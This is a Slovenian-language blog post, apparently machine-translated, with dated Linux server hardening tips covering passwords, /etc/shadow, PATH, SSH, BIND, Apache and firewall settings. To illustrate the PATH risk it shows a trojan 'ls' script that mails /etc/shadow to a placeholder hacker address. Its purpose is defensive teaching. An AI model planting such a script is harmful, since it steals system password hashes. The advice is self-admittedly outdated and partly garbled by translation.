Na blogu že dolgo ne objavljam ničesar in z vami bi rad delil nekaj nasvetov iz knjige, ki je (med drugim). Našel sem ga na univerzi in pravkar sem prebral in čeprav je resnično zastarel in prikazane tehnike verjetno ne bodo delovale glede na razvoj sistema, so pa tudi zanimivi vidiki, ki jih je mogoče pokazati.
Pojasniti želim, da gre za nasvete, usmerjene v sistem Linux, ki se uporablja kot strežnik v srednjem ali morda velikem obsegu, saj na namiznem uporabniškem nivoju, čeprav jih je mogoče uporabiti, ne bi bili zelo koristni.
Opažam tudi, da gre za preproste kratke nasvete in se ne bom spuščal v podrobnosti, čeprav nameravam narediti še veliko bolj natančno in obsežno objavo o določeni temi. Ampak to bom videl kasneje. Začnimo.
Pravilniki o geslih.
Čeprav se sliši kot modna fraza, dobra politika gesla razlikuje med ranljivim sistemom ali ne. Napadi, kot je "surova sila", izkoriščajo slabo geslo za dostop do sistema. Najpogostejši nasveti so:
- Združite velike in male črke.
- Uporabite posebne znake.
- Številke.
- Več kot 6 števk (upam, da več kot 8).
Poleg tega si oglejmo še dve bistveni datoteki. / etc / passwd in / etc / shadow.
Nekaj zelo pomembnega je, da datoteka / etc / passwd. Poleg tega, da nam navede ime uporabnika, njegov uid, pot do mape, bash .. itd. v nekaterih primerih prikazuje tudi šifrirani ključ uporabnika.
Poglejmo njegovo tipično sestavo.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
uporabnik: cryptkey: uid: gid: pot :: pot: bash
Resnična težava tukaj je, da ima ta datoteka dovoljenja -rw-r - r– kar pomeni, da ima dovoljenja za branje s strani katerega koli uporabnika sistema. in šifriran ključ ni zelo težko razbrati pravega.
Zato datoteka obstaja / etc / shadow. To je datoteka, v kateri so med drugim shranjeni vsi uporabniški ključi. Ta datoteka ima potrebna dovoljenja, tako da je noben uporabnik ne more prebrati.
Da bi to potem popravili, moramo iti do datoteke / etc / passwd in spremenite šifrirani ključ v "x", to bo povzročilo, da bo ključ shranjen samo v naši datoteki / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Težave s PATH in .bashrc in drugimi.
Ko uporabnik izvrši ukaz na svoji konzoli, lupina ta ukaz poišče na seznamu imenikov v spremenljivki okolja PATH.
Če v konzolo vtipkate "echo $ PATH", bo izpisal nekaj takega.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
V vsaki od teh map bo lupina iskala ukaz, napisan za njeno izvajanje. On "." to pomeni, da je prva mapa za iskanje ista mapa, iz katere se izvrši ukaz.
Recimo, da obstaja uporabnik "Carlos" in ta želi "storiti zlo." Ta uporabnik lahko pusti datoteko z imenom "ls" v svoji glavni mapi in v tej datoteki izvrši ukaz, kot je:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
In če korenski uporabnik za ciljne stvari poskuša našteti mape v mapi carlos (ker najprej poišče ukaz v isti mapi, bi nenamerno poslal datoteko z gesli na to e-pošto in nato mape bi bil na seznamu in ne bi izvedel šele pozno.
Da bi se temu izognili, moramo odpraviti "." spremenljivke PATH.
Na enak način je treba revidirati datoteke, kot so /.bashrc, /.bashrc_profile, ./.login, in preveriti, ali ni "." v spremenljivki PATH in dejansko iz datotek, kot je ta, lahko spremenite cilj določenega ukaza.
Nasveti s storitvami:
SHH
- Onemogočite različico 1 protokola ssh v datoteki sshd_config.
- Ne dovoli korenskemu uporabniku, da se prijavi s ssh.
- Datoteke in mape ssh_host_key, ssh_host_dsa_key in ssh_host_rsa_key naj bere samo korenski uporabnik.
BIND
- Spremenite pozdravno sporočilo v datoteki named.conf, tako da ne bo prikazala številke različice
- Omejite prenose z območja in jih omogočite samo za ekipe, ki jih potrebujejo.
Apache
- Storitvi preprečite, da bi v pozdravnem sporočilu prikazala svojo različico. Uredite datoteko httpd.conf in dodajte ali spremenite vrstice:
ServerSignature Off
ServerTokens Prod
- Onemogoči samodejno indeksiranje
- Konfigurirajte apache, da ne prikazuje občutljivih datotek, kot so .htacces, * .inc, * .jsp .. itd
- Odstranite priročne strani ali vzorec iz storitve
- Zaženite apache v chrootiranem okolju
Varnost omrežja.
Bistveno je, da prekrijete vse možne vhode v sistem iz zunanjega omrežja, tukaj je nekaj bistvenih nasvetov, kako preprečiti vsiljivcem skeniranje in pridobivanje informacij iz vašega omrežja.
Blokiraj promet ICMP
Požarni zid mora biti konfiguriran za blokiranje vseh vrst dohodnega in odhodnega prometa ICMP in odzivov. S tem se izognete, da vas na primer najde skener, ki išče živo opremo v območju IP.
Izogibajte se TCP-skeniranju pingov.
Eden od načinov za skeniranje sistema je TCP ping skeniranje. Recimo, da je na vašem strežniku strežnik Apache na vratih 80. Vdorilec bi lahko na ta vrata poslal zahtevo ACK, s tem pa bo, če se sistem odzove, računalnik živ in bo skeniral preostala vrata.
V ta namen mora imeti vaš požarni zid vedno možnost "stanje zavesti" in zavreči vse pakete ACK, ki ne ustrezajo že vzpostavljeni povezavi ali seji TCP.
Nekaj dodatnih nasvetov:
- Uporabite sisteme IDS za zaznavanje pregledov vrat v vašem omrežju.
- Konfigurirajte požarni zid tako, da ne zaupa nastavitvam vrat izvorne povezave.
To je zato, ker nekatera skeniranja uporabljajo "ponarejena" izvorna vrata, na primer 20 ali 53, saj jim mnogi sistemi zaupajo, ker so značilna za ftp ali DNS.
OPOMBA: Ne pozabite, da je bila večina težav, navedenih v tej objavi, že rešena v skoraj vseh trenutnih distribucijah. Nikoli pa ne škodi, če imate ključne informacije o teh težavah, da se vam ne bi zgodile.
OPOMBA: Kasneje bom videl določeno temo in objavil prispevek z veliko podrobnejšimi in aktualnimi informacijami.
Zahvali vsem za branje.
Lep pozdrav.
Članek mi je bil zelo všeč in zadeva me zanima, spodbujam vas, da nadaljujete z nalaganjem vsebine.